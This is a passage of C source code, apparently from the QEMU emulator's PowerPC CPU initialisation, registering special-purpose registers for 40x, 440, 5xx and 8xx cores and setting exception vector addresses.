SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DNV1, "DNV1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DNV2, "DNV2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DNV3, "DNV3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DTV0, "DTV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DTV1, "DTV1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DTV2, "DTV2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DTV3, "DTV3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DVLIM, "DVLIM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_INV0, "INV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_INV1, "INV1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_INV2, "INV2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_INV3, "INV3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_ITV0, "ITV0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_ITV1, "ITV1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_ITV2, "ITV2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_ITV3, "ITV3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_IVLIM, "IVLIM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Cache debug */ /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DCDBTRH, "DCDBTRH", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DCDBTRL, "DCDBTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_ICDBDR, "ICDBDR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_ICDBTRH, "ICDBTRH", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_ICDBTRL, "ICDBTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_440_DBDR, "DBDR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Processor control */ spr_register(env, SPR_4xx_CCR0, "CCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_440_RSTCFG, "RSTCFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* Storage control */ spr_register(env, SPR_440_MMUCR, "MMUCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR shared between PowerPC 40x implementations */ static void gen_spr_40x(CPUPPCState *env) { /* Cache */ /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_40x_DCCR, "DCCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_40x_ICCR, "ICCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_BOOKE_ICDBDR, "ICDBDR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* Exception */ spr_register(env, SPR_40x_DEAR, "DEAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_ESR, "ESR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_EVPR, "EVPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_excp_prefix, 0x00000000); spr_register(env, SPR_40x_SRR2, "SRR2", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_SRR3, "SRR3", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, 0x00000000); /* Timers */ spr_register(env, SPR_40x_PIT, "PIT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_40x_pit, &spr_write_40x_pit, 0x00000000); spr_register(env, SPR_40x_TCR, "TCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_tcr, 0x00000000); spr_register(env, SPR_40x_TSR, "TSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_tsr, 0x00000000); } /* SPR specific to PowerPC 405 implementation */ static void gen_spr_405(CPUPPCState *env) { /* MMU */ spr_register(env, SPR_40x_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_4xx_CCR0, "CCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00700000); /* Debug interface */ /* XXX : not implemented */ spr_register(env, SPR_40x_DBCR0, "DBCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_dbcr0, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_DBCR1, "DBCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_DBSR, "DBSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, /* Last reset was system reset */ 0x00000300); /* XXX : not implemented */ spr_register(env, SPR_40x_DAC1, "DAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_DAC2, "DAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_DVC1, "DVC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_DVC2, "DVC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_IAC1, "IAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_IAC2, "IAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_IAC3, "IAC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_IAC4, "IAC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Storage control */ /* XXX: TODO: not implemented */ spr_register(env, SPR_405_SLER, "SLER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_sler, 0x00000000); spr_register(env, SPR_40x_ZPR, "ZPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_405_SU0R, "SU0R", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* SPRG */ spr_register(env, SPR_USPRG0, "USPRG0", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, spr_read_generic, &spr_write_generic, 0x00000000); gen_spr_usprgh(env); } /* SPR shared between PowerPC 401 & 403 implementations */ static void gen_spr_401_403(CPUPPCState *env) { /* Time base */ spr_register(env, SPR_403_VTBL, "TBL", &spr_read_tbl, SPR_NOACCESS, &spr_read_tbl, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_403_TBL, "TBL", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_tbl, 0x00000000); spr_register(env, SPR_403_VTBU, "TBU", &spr_read_tbu, SPR_NOACCESS, &spr_read_tbu, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_403_TBU, "TBU", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_tbu, 0x00000000); /* Debug */ /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_403_CDBCR, "CDBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 401 implementation */ static void gen_spr_401(CPUPPCState *env) { /* Debug interface */ /* XXX : not implemented */ spr_register(env, SPR_40x_DBCR0, "DBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_dbcr0, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_DBSR, "DBSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, /* Last reset was system reset */ 0x00000300); /* XXX : not implemented */ spr_register(env, SPR_40x_DAC1, "DAC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_IAC1, "IAC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Storage control */ /* XXX: TODO: not implemented */ spr_register(env, SPR_405_SLER, "SLER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_sler, 0x00000000); /* not emulated, as QEMU never does speculative access */ spr_register(env, SPR_40x_SGR, "SGR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0xFFFFFFFF); /* not emulated, as QEMU do not emulate caches */ spr_register(env, SPR_40x_DCWR, "DCWR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_401x2(CPUPPCState *env) { gen_spr_401(env); spr_register(env, SPR_40x_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_ZPR, "ZPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 403 implementation */ static void gen_spr_403(CPUPPCState *env) { /* Debug interface */ /* XXX : not implemented */ spr_register(env, SPR_40x_DBCR0, "DBCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_dbcr0, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_DBSR, "DBSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, /* Last reset was system reset */ 0x00000300); /* XXX : not implemented */ spr_register(env, SPR_40x_DAC1, "DAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_DAC2, "DAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_IAC1, "IAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_40x_IAC2, "IAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_403_real(CPUPPCState *env) { spr_register(env, SPR_403_PBL1, "PBL1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_403_pbr, &spr_write_403_pbr, 0x00000000); spr_register(env, SPR_403_PBU1, "PBU1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_403_pbr, &spr_write_403_pbr, 0x00000000); spr_register(env, SPR_403_PBL2, "PBL2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_403_pbr, &spr_write_403_pbr, 0x00000000); spr_register(env, SPR_403_PBU2, "PBU2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_403_pbr, &spr_write_403_pbr, 0x00000000); } static void gen_spr_403_mmu(CPUPPCState *env) { /* MMU */ spr_register(env, SPR_40x_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_40x_ZPR, "ZPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC compression coprocessor extension */ static void gen_spr_compress(CPUPPCState *env) { /* XXX : not implemented */ spr_register(env, SPR_401_SKR, "SKR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } #if defined(TODO_USER_ONLY) static void gen_spr_5xx_8xx(CPUPPCState *env) { /* Exception processing */ spr_register_kvm(env, SPR_DSISR, "DSISR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DSISR, 0x00000000); spr_register_kvm(env, SPR_DAR, "DAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DAR, 0x00000000); /* Timer */ spr_register(env, SPR_DECR, "DECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_decr, &spr_write_decr, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_EIE, "EIE", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_EID, "EID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_NRI, "NRI", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPA, "CMPA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPB, "CMPB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPC, "CMPC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPD, "CMPD", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_ECR, "ECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DER, "DER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_COUNTA, "COUNTA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_COUNTB, "COUNTB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPE, "CMPE", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPF, "CMPF", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPG, "CMPG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_CMPH, "CMPH", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_LCTRL1, "LCTRL1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_LCTRL2, "LCTRL2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_BAR, "BAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DPDR, "DPDR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_IMMR, "IMMR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_5xx(CPUPPCState *env) { /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_GRA, "MI_GRA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_GRA, "L2U_GRA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RPCU_BBCMCR, "L2U_BBCMCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_MCR, "L2U_MCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RBA0, "MI_RBA0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RBA1, "MI_RBA1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RBA2, "MI_RBA2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RBA3, "MI_RBA3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RBA0, "L2U_RBA0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RBA1, "L2U_RBA1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RBA2, "L2U_RBA2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RBA3, "L2U_RBA3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RA0, "MI_RA0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RA1, "MI_RA1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RA2, "MI_RA2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_MI_RA3, "MI_RA3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RA0, "L2U_RA0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RA1, "L2U_RA1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RA2, "L2U_RA2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_L2U_RA3, "L2U_RA3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_RCPU_FPECR, "FPECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_8xx(CPUPPCState *env) { /* XXX : not implemented */ spr_register(env, SPR_MPC_IC_CST, "IC_CST", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_IC_ADR, "IC_ADR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_IC_DAT, "IC_DAT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DC_CST, "DC_CST", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DC_ADR, "DC_ADR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_DC_DAT, "DC_DAT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_CTR, "MI_CTR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_AP, "MI_AP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_EPN, "MI_EPN", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_TWC, "MI_TWC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_RPN, "MI_RPN", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_DBCAM, "MI_DBCAM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_DBRAM0, "MI_DBRAM0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MI_DBRAM1, "MI_DBRAM1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_CTR, "MD_CTR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_CASID, "MD_CASID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_AP, "MD_AP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_EPN, "MD_EPN", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_TWB, "MD_TWB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_TWC, "MD_TWC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_RPN, "MD_RPN", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_TW, "MD_TW", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_DBCAM, "MD_DBCAM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_DBRAM0, "MD_DBRAM0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MPC_MD_DBRAM1, "MD_DBRAM1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } #endif /* * AMR => SPR 29 (Power 2.04) * CTRL => SPR 136 (Power 2.04) * CTRL => SPR 152 (Power 2.04) * SCOMC => SPR 276 (64 bits ?) * SCOMD => SPR 277 (64 bits ?) * TBU40 => SPR 286 (Power 2.04 hypv) * HSPRG0 => SPR 304 (Power 2.04 hypv) * HSPRG1 => SPR 305 (Power 2.04 hypv) * HDSISR => SPR 306 (Power 2.04 hypv) * HDAR => SPR 307 (Power 2.04 hypv) * PURR => SPR 309 (Power 2.04 hypv) * HDEC => SPR 310 (Power 2.04 hypv) * HIOR => SPR 311 (hypv) * RMOR => SPR 312 (970) * HRMOR => SPR 313 (Power 2.04 hypv) * HSRR0 => SPR 314 (Power 2.04 hypv) * HSRR1 => SPR 315 (Power 2.04 hypv) * LPIDR => SPR 317 (970) * EPR => SPR 702 (Power 2.04 emb) * perf => 768-783 (Power 2.04) * perf => 784-799 (Power 2.04) * PPR => SPR 896 (Power 2.04) * DABRX => 1015 (Power 2.04 hypv) * FPECR => SPR 1022 (?) * ... and more (thermal management, performance counters, ...) */ /*****************************************************************************/ /* Exception vectors models */ static void init_excp_4xx_real(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_PIT] = 0x00001000; env->excp_vectors[POWERPC_EXCP_FIT] = 0x00001010; env->excp_vectors[POWERPC_EXCP_WDT] = 0x00001020; env->excp_vectors[POWERPC_EXCP_DEBUG] = 0x00002000; env->ivor_mask = 0x0000FFF0UL; env->ivpr_mask = 0xFFFF0000UL; /* Hardware reset vector */ env->hreset_vector = 0xFFFFFFFCUL; } static void init_excp_4xx_softmmu(CPUPPCState *env) { env->excp_vectors[POWERPC_EXCP_CRITICAL] = 0x00000100; env->excp_vectors[POWERPC_EXCP_MCHECK] = 0x00000200; env->excp_vectors[POWERPC_EXCP_DSI] = 0x00000300; env->excp_vectors[POWERPC_EXCP_ISI] = 0x00000400; env->excp_vectors[POWERPC_EXCP_EXTERNAL] = 0x00000500; env->excp_vectors[POWERPC_EXCP_ALIGN] = 0x00000600; env->excp_vectors[POWERPC_EXCP_PROGRAM] = 0x00000700; env->excp_vectors[POWERPC_EXCP_SYSCALL] = 0x00000C00; env->excp_vectors[POWERPC_EXCP_PIT] = 0x00001000; 